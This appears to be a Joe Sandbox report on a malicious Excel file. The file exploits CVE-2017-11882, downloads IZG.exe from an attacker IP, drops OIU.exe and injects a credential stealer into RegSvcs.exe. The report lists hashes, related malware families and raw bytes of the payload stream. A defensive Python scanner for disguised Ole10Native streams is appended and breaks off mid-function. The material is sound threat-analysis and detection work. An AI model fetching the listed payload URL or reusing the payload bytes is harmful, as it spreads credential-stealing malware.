          signatures: Binary is likely a compiled AutoIt script file
          RegSvcs.exe
          OIU.exe
            signatures: Binary is likely a compiled AutoIt script file
            RegSvcs.exe
            OIU.exe
              signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
              RegSvcs.exe
                signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
chrome.exe
  -> 239.255.255.250 (unknown, Reserved)
  chrome.exe
    -> www.google.com 172.217.1.4, 443, 49164, 49168 (GOOGLEUS, United States)
chrome.exe
  chrome.exe

Antivirus detection, submitted sample:
Source | Detection | Scanner | Label
Order Request1_5_24.xlam.xlsx | 52% | Virustotal |
Order Request1_5_24.xlam.xlsx | 68% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882
Order Request1_5_24.xlam.xlsx | 100% | Avira | EXP/CVE-2017-11882.Gen

Antivirus detection, dropped files:
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\OIU.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\OIU.exe | 27% | ReversingLabs |

No Antivirus matches
No Antivirus matches

Antivirus detection, URLs:
Source | Detection | Scanner | Label
http://23.94.54.101/IZG.exe | 0% | Avira URL Cloud | safe
https://api.ipify. | 0% | Avira URL Cloud | safe
http://23.94.54.101/IZG.exe | 5% | Virustotal |
Contacted domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.google.com | 172.217.1.4 | true | false | | high
Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
https://www.google.com/async/ddljson?async=ntp:2 | false | | high
http://23.94.54.101/IZG.exe | true | 5% (Virustotal); Avira URL Cloud: safe | unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKiDzLEGIjBAUeVDNkDlIZK5bJjKqxg5bm1WdYDjlLN5FTPlXAMxmGzLgqn1-pjmnO28YPm4sx4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | false | | high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw | false | | high
https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKeDzLEGIjBSLRpDP2VScdj7Wpd5SrmnrYLtq8Jxv8Ovu6XTpT1_vcDso1uPHungiEeAb9P6jnYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | false | | high
https://www.google.com/async/newtab_promos | false | | high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 | false | | high
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGKeDzLEGIjDeDtf43edoX_DQr4xePeWIRj_Zk_cdJHjRaIqGGnjHhWEURD3S2dwEoI7xgpMRkzoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | false | | high
https://www.google.com/chrome/whats-new/m109?internal=true | false | | high
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKeDzLEGIjAngwEuuQDIFwKdm-Bs70gGjylYp6jr6gUkagUnxegoQxARWccq1LwEgBECfcL1PAAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | false | | high
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKiDzLEGIjDtjnMJodbdiXF-HQ_fQDkAxnKugxL_IiaU5Bdf1yGe-xSVBDfYF_nK-idk43_IHf0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | false | | high
URLs from memory and binary data:
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | RegSvcs.exe, 0000000C.00000002.620104008.0000000002858000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ipify.org | RegSvcs.exe, 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620104008.0000000002761000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620104008.000000000281C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://account.dyn.com/ | RegSvcs.exe, 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 0000000C.00000002.620104008.0000000002761000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620104008.0000000002858000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ipify. | RegSvcs.exe, 0000000C.00000002.620104008.0000000002858000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
239.255.255.250 | unknown | Reserved | unknown | unknown | false
23.94.54.101 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
172.217.1.4 | www.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1435095
Start date and time: 2024-05-02 04:57:28 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 20
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Order Request1_5_24.xlam.xlsx
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winXLSX@42/18@4/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 81
• Number of non-executed functions: 278
Cookbook Comments:
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, vga.dll
• Excluded IPs from analysis (whitelisted): 142.251.33.163, 172.253.63.84, 142.251.32.78, 34.104.35.123
• Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
04:59:06 | API Interceptor | 26x Sleep call for process: EQNEDT32.EXE modified
04:59:13 | API Interceptor | 9x Sleep call for process: RegSvcs.exe modified
IP context (samples previously seen contacting the same IP):
Match | Associated Sample Name / URL | Detection | Threat Name | Context
239.255.255.250 | 202404294766578200.xlam.xlsx | malicious | Remcos |
239.255.255.250 | 7sYKxZWLgw.exe | malicious | PureLog Stealer |
239.255.255.250 | Account report (1).docx | malicious | Unknown |
239.255.255.250 | Account report (1).docx | malicious | Unknown |
239.255.255.250 | Account report (1).docx | malicious | Unknown |
239.255.255.250 | Account report (1).docx | malicious | Unknown |
239.255.255.250 | SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exe | malicious | Unknown |
239.255.255.250 | https://ipgnz-my.sharepoint.com/:b:/p/dennis/EQBdT3T6DAtNud_AgeVvevoBe4Wv-zzpt7vOYoJkOhRHCQ?e=4%3ao8ZtZs&at=9&xsdata=MDV8MDJ8bGlhbmRhLnN0b2VsQG1sY2luc3VyYW5jZS5jb20uYXV8ZWQ1OTE1MzNhZDY4NDYyZGVhMzEwOGRjNjk4OGRiNjR8YTRlYmRjZDY2ODU0NGRlMGIxOGM3MmQ2ZjA5ZDA1MzV8MHwwfDYzODUwMTI4NDE4MTIzMzI1MXxVbmtub3dufFRXRnBiR1pzYjNkOGV5SldJam9pTUM0d0xqQXdNREFpTENKUUlqb2lWMmx1TXpJaUxDSkJUaUk2SWsxaGFXd2lMQ0pYVkNJNk1uMD18ODAwMDB8fHw%3d&sdata=Zjh2Q283ajAyWEprbjBOUFdSdEFmRDhIdUU4Ym01c0JKNzV6cU1BWklhST0%3d | malicious | HTMLPhisher |
239.255.255.250 | Signature requested-Fiona QR.png | malicious | HTMLPhisher |
239.255.255.250 | Arrival Notice.xls | malicious | Unknown |
23.94.54.101 | 202404294766578200.xlam.xlsx | malicious | Remcos | 23.94.54.101/GVV.exe
23.94.54.101 | attachment.xlam.xlsx | malicious | AgentTesla, PureLog Stealer, RedLine | 23.94.54.101/EPQ.exe
23.94.54.101 | NI-45733-D.xlam.xlsx | malicious | AgentTesla, PureLog Stealer, RedLine | 23.94.54.101/ESS.exe
                                                                    No context
ASN context (samples previously seen contacting the same ASN):
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSINGUS | 202404294766578200.xlam.xlsx | malicious | Remcos | 23.94.53.100
AS-COLOCROSSINGUS | OWrVfOdM62.rtf | malicious | AgentTesla, PureLog Stealer | 192.3.239.4
AS-COLOCROSSINGUS | ET2431000075 & ET2431000076.xls | malicious | AgentTesla, PureLog Stealer | 192.3.239.4
AS-COLOCROSSINGUS | nU7Z8sPyvf.rtf | malicious | Remcos | 107.172.31.6
AS-COLOCROSSINGUS | SecuriteInfo.com.Linux.Siggen.9999.4824.4127.elf | malicious | Gafgyt, Mirai | 23.94.151.97
AS-COLOCROSSINGUS | QF3YL9rOxB.rtf | malicious | AgentTesla | 192.3.243.154
AS-COLOCROSSINGUS | attachment.xlam.xlsx | malicious | AgentTesla, PureLog Stealer, RedLine | 23.94.54.101
AS-COLOCROSSINGUS | citat-05012024.xla.xlsx | malicious | Unknown | 192.3.243.154
AS-COLOCROSSINGUS | cotizaci#U00f3n_04302024.xla.xlsx | malicious | AgentTesla | 192.3.243.154
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.ShellCode.69.24915.2103.rtf | malicious | AgentTesla | 192.3.243.154
                                                                    No context
                                                                    No context
Dropped file:
Process: C:\Users\user\AppData\Roaming\OIU.exe
File Type: data
Category: dropped
Size (bytes): 268800
Entropy (8bit): 7.905027527993877
Encrypted: false
SSDEEP: 6144:0GQG5ytMEwsoj9AKpFNUQ02J2O3O3ik+Bvvn+wH4Boc:0GQG5yssCFNUQbJ2YO3WlP+O8oc
MD5: 183BA29E3BA1A448C983A6772EA728E8
SHA1: 43E8E4E6C8925D72F3B24EF74BD7017F6D7503C1
SHA-256: 2C74D0B73DA91109988EA8AE9AE5BE693FD1F565751DFD28E4D4F5F4BDEA91B5
SHA-512: F2BF3E7DCCEF67AE24D9401B10D726C0085616235B38CDEFD9C8BF1C952F7ACEB61E0AEEA711FF7A797921F5BDE8F75BB02CEC26FDC5271840FD8723602B1C0D
Malicious: false
Dropped file:
Process: C:\Users\user\AppData\Roaming\OIU.exe
File Type: data
Category: dropped
Size (bytes): 9940
Entropy (8bit): 7.592861217976908
Encrypted: false
SSDEEP: 192:m+cKsSwxOCyTkff82lMdISQUNa53yJLEf8DPxoSGNg6D5lDdRz:97sSwcHkHUOSQl3yJLO8eS+gyZ5
MD5: 6DBA02FD0343E04E1B01CC0EABB5E980
SHA1: 9C7EC5BC479120D7BFE17F9485C119AD6939E7F7
SHA-256: CD2DD52672ACC9C08FAF4F77A0CC86AD47FB45541C49AD06BC8AE4D82510634E
SHA-512: 88EA1BD1CB0E59CCBBCA8B58C3FDA8F9084DA2CE31DB794BE47965B3A9B19383893851315FBA7D5F00D99F6155ADF98E5B8751FA2273904C1B6914B5AA8E19A8
Malicious: false
                                                                    SHA-256:2C74D0B73DA91109988EA8AE9AE5BE693FD1F565751DFD28E4D4F5F4BDEA91B5
                                                                    SHA-512:F2BF3E7DCCEF67AE24D9401B10D726C0085616235B38CDEFD9C8BF1C952F7ACEB61E0AEEA711FF7A797921F5BDE8F75BB02CEC26FDC5271840FD8723602B1C0D
                                                                    Malicious:false
                                                                    Preview:yc.152P2COOE.TN.9C08CIA.B6L5I49T162P2GOOE5STNI9C08CIABB6L5I.9T18-.<G.F...U....XQ0i10-Q>T$.Z5_X]$.%*o7@=t''...kc$.&'.A8C.9T162P2/_.h.".0eH.N.2.?paI2.8.G_..L{C.1c4.-.?.Gq.V=U0.<.o\7.H.O..+Lj>.;g:7&eH.N8CIABB6L5I49T162..U)OE5S..I9.1<C=.B.6L5I49T1.2s3LNFE5.UNIGA08CIAm.6L5Y49T.72P2.OOU5STLI9F08CIABB3L5I49T16RT2GKOE.hVNK9C.8CYABR6L5I$9T!62P2GO_E5STNI9C08C.T@BfL5I4YV1:.Q2GOOE5STNI9C08CIABB6L5I49..72L2GOOE5STNI9C08CIABB6L5I49T1.?R2.OOE5STNI9C08.HA.C6L5I49T162P2GOOE5STNI9C08Cg5':BL5I,.U16"P2G.NE5WTNI9C08CIABB6L.I4YzCRS$SGO.(5ST.H9C^8CI.CB6L5I49T162P2.OO..75:(9C0.sIABb4L5_49T;42P2GOOE5STNI9.08.g310UL5I8.U16RR2G.NE5sVNI9C08CIABB6LuI4yT162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GO
                                                                    Process:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    File Type:ASCII text, with very long lines (29744), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):29744
                                                                    Entropy (8bit):3.5466799935057463
                                                                    Encrypted:false
                                                                    SSDEEP:768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbiE+I76Md4vfF3if6gyb:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RW
                                                                    MD5:022B24B208B162C3C5E12C60AE82BCC0
                                                                    SHA1:92FEB09862427996BA4C0D9A210956B58BCAEB0F
                                                                    SHA-256:77D16500EF4C0335FA369BD45964FCD6317CD6771871DFE5748E7D266C9982CD
                                                                    SHA-512:42E46A68A292BADD9739A673F4441A6C584E567A5E1ADEFBA43C0567375E09A3F82A84C244EB4C5F3AAE35D9E4EC7513496D56107A64E181CD02E54ABAE90E4C
                                                                    Malicious:false
                                                                    Preview:
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):165
                                                                    Entropy (8bit):1.4377382811115937
                                                                    Encrypted:false
                                                                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                    MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                    Malicious:false
                                                                    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1287680
                                                                    Entropy (8bit):7.045054906252616
                                                                    Encrypted:false
                                                                    SSDEEP:24576:rqDEvCTbMWu7rQYlBQcBiT6rprG8aHd/W1zVtAdczPe8:rTvC/MTQYxsWR7aHd/WFVpz
                                                                    MD5:158C5C0367C262694F3C44AE85B891B6
                                                                    SHA1:C8AE2619967B6FBF4962A57A34C614B7C6517B45
                                                                    SHA-256:82215185860A139B407AD688A9A83A05EF78A9AF58EE96F575E8DBA25B965340
                                                                    SHA-512:EF67D25306F175AB98E33F2730B2423FE20C433B1329D8C6C5812B428CB040DBB4965D8C59D5AA3A99A0E1AFEF54E0C918075768F6B3D2CF68119D1AA872D3EA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 27%
                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....1f..........".................w.............@..................................*....@...@.......@.....................d...|....@...:.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....:...@...<..................@..@.reloc...u.......v...0..............@..B........................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (3253)
                                                                    Category:downloaded
                                                                    Size (bytes):3258
                                                                    Entropy (8bit):6.042863739356364
                                                                    Encrypted:false
                                                                    SSDEEP:96:u/opgisBk0uugU/uWTyTITd7fWPwyoaSfffQfo:qbzBkqD2mh7fW6
                                                                    MD5:623A804EE6264AE671A96653081E9128
                                                                    SHA1:A8779CBBB4A74B9108515E242366B015D8DAEA17
                                                                    SHA-256:F5E7FE92BE748DC2AA814D2C09C4A0D74DAA8A830138295BDECBE6F151EE1DDB
                                                                    SHA-512:A626EE4F3874D61DF6F62F4B5A0D17853E9F8E175240645BCD8B61CEBCDF4CD35251DDA9A483A565CC435377F8D313093C7519C8E38B06E310FD251E8FD31E86
                                                                    Malicious:false
                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                    Preview:)]}'.["",["airbnb icons x men","east fork san jacinto river flooding","miami dolphins stephen ross","ps plus may 2024 monthly games","heeramandi sanjay leela bhansali","uefa champions league dortmund vs psg","federal reserve interest rates","colleen hoover verity movie"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"pre":0,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"a":"Heeramandi \u2014 Drama series","dc":"#424242","i":"data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBwgHBgkIBwgKCgkLDRYPDQwMDRsUFRAWIB0iIiAdHx8kKDQsJCYxJx8fLT0tMTU3Ojo6Iys/RD84QzQ5OjcBCgoKDQwNGg8PGjclHyU3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3N//AABEIAEAAQAMBIgACEQEDEQH/xAAbAAABBQEBAAAAAAAAAAAAAAAGAgMEBQcBAP/EADgQAAIBAgUBBgMFBwUAAAAAAAECAwQRAAUSITFBBhMiUWGBMnGRFJKhscEVJFKiwuHwB0JTcoL/xAAYAQADAQEAAAAAAAAAAAAAAAACAwQBAP/EAB0RAQACAwEBAQEAAAAAAAAAAAEAAgMRIRIxURP
                                                                    File type:Microsoft Excel 2007+
                                                                    Entropy (8bit):7.998032876633694
                                                                    TrID:
                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                    • ZIP compressed archive (8000/1) 16.67%
                                                                    File name:Order Request1_5_24.xlam.xlsx
                                                                    File size:670'312 bytes
                                                                    MD5:8216d3088f8358388dfcbdc7026f2ea1
                                                                    SHA1:3040eaecd169f745eae12c30652eebc676c3f234
                                                                    SHA256:37d95e56ed2ab7dbaeae0f8afad3d94ffd9286dee2447ad631b52ecd84a4f47a
                                                                    SHA512:029f80578514d71ea67d0140423a1732d95006d647d852ff5db3e0ad401499e7bc537c8302fd056187233100428c1f23ddeceed8616f3a62d78de821dc0586f5
                                                                    SSDEEP:12288:FnnWqkrsXN8zr24zzR80FjO/O4YONMYCJ4n44JhzwFjlIZhXDExExQeFZlW:daraiSK8CjOG4fg444zkjqw2d7E
                                                                    TLSH:13E433F8062A1118E7F713F3B9B9178EE97DB5080223ED3B8AD6CC741076979D25B909
                                                                    File Content Preview:PK...........X8sI.............[Content_Types].xmlUT.....1f..1f..1f.U.n.0....?..."..m..J.Iz).....J.k.6_ .?..K)6...b...vgf..X.n.F.k.Q9[.)....pR.."....7R.....Y..."....a6.y...m.H....X.-....`1.p.....a...o.}.L.2.l....9......E..~...JjeIq..e..p...<a...|#R..B..N..
                                                                    Icon Hash:2562ab89a7b7bfbf
                                                                    Document Type:OpenXML
                                                                    Number of OLE Files:1
                                                                    Has Summary Info:
                                                                    Application Name:
                                                                    Encrypted Document:False
                                                                    Contains Word Document Stream:False
                                                                    Contains Workbook/Book Stream:False
                                                                    Contains PowerPoint Document Stream:False
                                                                    Contains Visio Document Stream:False
                                                                    Contains ObjectPool Stream:False
                                                                    Flash Objects Count:0
                                                                    Contains VBA Macros:False
                                                                    Author:SHINY
                                                                    Last Saved By:X10LUXURY
                                                                    Create Time:2010-06-04T08:55:28Z
                                                                    Last Saved Time:2023-07-30T22:56:25Z
                                                                    Creating Application:Microsoft Excel
                                                                    Security:0
                                                                    Thumbnail Scaling Desired:false
                                                                    Company:Grizli777
                                                                    Contains Dirty Links:false
                                                                    Shared Document:false
                                                                    Changed Hyperlinks:false
                                                                    Application Version:15.0300
                                                                    General
                                                                    Stream Path:\x1OLE10nATIvE
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:916531
                                                                    Entropy:5.94177171020429
                                                                    Base64 Encoded:False
                                                                    Data ASCII:i T . . k f . . . . 3 g u Q . ^ ~ w g . . P . $ . - . ` A . & % . . ~ | k H . 5 C d x R Z b ` + @ 2 . B d . t [ f 9 c . k F { [ d , Q < $ . Q . . . B # O R 2 t < . . _ . = A O . * . / b / > { S r r i . . ( v U x f k . ) : p . X Q c 3 G N . W T { E K @ n r . , L . K . w . 0 O h . M . S f 3 i m . . W . . . . f . $ D . . f f ( = 9 h = 3 . > . . | _ . . h . . v . . W . 8 . y { [ 1 . Y R V + . + Z . . Q ] . c . e c ] n . . . f 4 2 . = K E _ O ' m . H \\ . ! C G e S S . [ W * . . N . P . 1 # - . . & \\ S . y ) u \\
                                                                    Data Raw:69 54 ee 04 03 ae ae 6b 66 06 01 08 85 cc bd ff fd d5 33 81 e5 eb be 67 88 8b 75 51 8b 06 be b5 ef 5e 7e 81 e6 f2 77 67 01 8b 2e 50 ff d5 05 24 07 a6 ba 2d 9f 06 a6 ba ff e0 c7 60 41 00 9b 26 25 90 c9 15 d3 8f 7e 7c 6b 48 86 12 35 f0 df 43 85 fc f3 dd 64 78 a7 52 5a 62 db 60 e2 cb ec 80 dc c3 c1 2b 9b 40 85 e6 d1 32 1d 42 90 cc 64 1d 74 bf 5b e0 66 86 39 99 63 cc aa 6b bc 46 7b 99
                                                                    General
                                                                    Stream Path:J43jSvnj0uFSo
                                                                    CLSID:
                                                                    File Type:empty
                                                                    Stream Size:0
                                                                    Entropy:0.0
                                                                    Base64 Encoded:False
                                                                    Data ASCII:
                                                                    Data Raw:
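The stream path listed above, `\x1OLE10nATIvE`, is the embedded object's Ole10Native stream with its name case-mangled: Office writes that name as `\x01Ole10Native`, and because compound-file stream lookups are case-insensitive the 916531-byte blob is still handed to the object's server (the Equation Editor, per the EQNEDT32.EXE entries above) while scanners that match the canonical spelling miss it. The script below is an added example, not part of the Joe Sandbox report or any vendor tool: it unzips an .xlsx, reads each `xl/embeddings/*.bin` compound file with a minimal standard-library CFB reader, and flags any stream whose name equals `Ole10Native` only after case folding, reporting its size and entropy. The `build_sample_*` helpers are constructed fixtures for offline runs, not data from the sample.

```python
"""Flag embedded OLE objects whose Ole10Native stream name is case-mangled.

Added example (not from the Joe Sandbox report). Standard library only: a
minimal Compound File Binary (CFB) reader is included so it runs offline.
Streams below the mini-stream cutoff (4096 bytes) are skipped; the payloads
of interest are far larger than that.
"""
import io
import math
import struct
import zipfile

CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
ENDOFCHAIN, FREESECT, FATSECT, NOSTREAM = 0xFFFFFFFE, 0xFFFFFFFF, 0xFFFFFFFD, 0xFFFFFFFF
STREAM_TYPE, ROOT_TYPE = 2, 5
EXPECTED_NAME = "\x01Ole10Native"  # the spelling Office itself writes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def cfb_streams(blob: bytes):
    """Yield (name, data) for each regular stream in a CFB container."""
    if blob[:8] != CFB_MAGIC:
        raise ValueError("not a compound file")
    sec = 1 << struct.unpack_from("<H", blob, 0x1E)[0]      # sector size from the header
    first_dir = struct.unpack_from("<I", blob, 0x30)[0]
    cutoff = struct.unpack_from("<I", blob, 0x38)[0]        # mini-stream cutoff (4096)
    sector = lambda sid: blob[(sid + 1) * sec:(sid + 2) * sec]

    fat = []                                                  # FAT sectors named in the header DIFAT
    for sid in struct.unpack_from("<109I", blob, 0x4C):
        if sid == FREESECT:
            break
        fat.extend(struct.unpack(f"<{sec // 4}I", sector(sid)))

    def chain(start):                                         # follow a FAT chain, refusing loops
        sid, seen = start, set()
        while sid != ENDOFCHAIN:
            if sid in seen or sid >= len(fat):
                raise ValueError("corrupt FAT chain")
            seen.add(sid)
            yield sector(sid)
            sid = fat[sid]

    directory = b"".join(chain(first_dir))
    for off in range(0, len(directory), 128):                 # one 128-byte directory entry each
        entry = directory[off:off + 128]
        name_len = struct.unpack_from("<H", entry, 0x40)[0]
        if entry[0x42] != STREAM_TYPE or name_len < 2:
            continue
        name = entry[:name_len - 2].decode("utf-16-le")       # drop the UTF-16 terminator
        start, size = struct.unpack_from("<IQ", entry, 0x74)
        if size < cutoff:
            continue                                          # lives in the mini stream; not handled
        yield name, b"".join(chain(start))[:size]


def suspicious_ole_streams(blob: bytes) -> list:
    """Report every stream named Ole10Native in any letter case."""
    findings = []
    for name, data in cfb_streams(blob):
        if name.lower() == EXPECTED_NAME.lower():
            findings.append({"name": name, "case_mangled": name != EXPECTED_NAME,
                             "size": len(data), "entropy": round(shannon_entropy(data), 3)})
    return findings


def scan_xlsx(src) -> dict:
    """src: path or bytes of an .xlsx/.xlsm; scans every xl/embeddings/*.bin member."""
    with zipfile.ZipFile(io.BytesIO(src) if isinstance(src, bytes) else src) as z:
        return {n: suspicious_ole_streams(z.read(n)) for n in z.namelist()
                if n.startswith("xl/embeddings/") and n.endswith(".bin")}


def build_sample_cfb(stream_name: str, payload: bytes) -> bytes:
    """Constructed fixture: a one-stream v3 CFB (512-byte sectors, payload >= 4096 bytes)."""
    sec, n_data = 512, -(-len(payload) // 512)
    # Sector 0 = FAT, 1 = directory, 2.. = payload chain.
    fat = [FATSECT, ENDOFCHAIN] + list(range(3, 2 + n_data)) + [ENDOFCHAIN]
    fat += [FREESECT] * (sec // 4 - len(fat))

    def entry(name, kind, child, start, size):
        raw = name.encode("utf-16-le") + b"\x00\x00"
        return (raw.ljust(64, b"\x00") + struct.pack("<HBBIII", len(raw), kind, 1, NOSTREAM, NOSTREAM, child)
                + bytes(36) + struct.pack("<IQ", start, size))

    header = (CFB_MAGIC + bytes(16) + struct.pack("<HHHHH", 0x3E, 3, 0xFFFE, 9, 6) + bytes(6)
              + struct.pack("<9I", 0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
              + struct.pack("<109I", 0, *([FREESECT] * 108)))
    directory = (entry("Root Entry", ROOT_TYPE, 1, ENDOFCHAIN, 0)
                 + entry(stream_name, STREAM_TYPE, NOSTREAM, 2, len(payload)) + bytes(256))
    return header + struct.pack("<128I", *fat) + directory + payload.ljust(n_data * sec, b"\x00")


def build_sample_xlsx(ole_blob: bytes) -> bytes:
    """Constructed fixture: the minimum zip layout scan_xlsx() looks at."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
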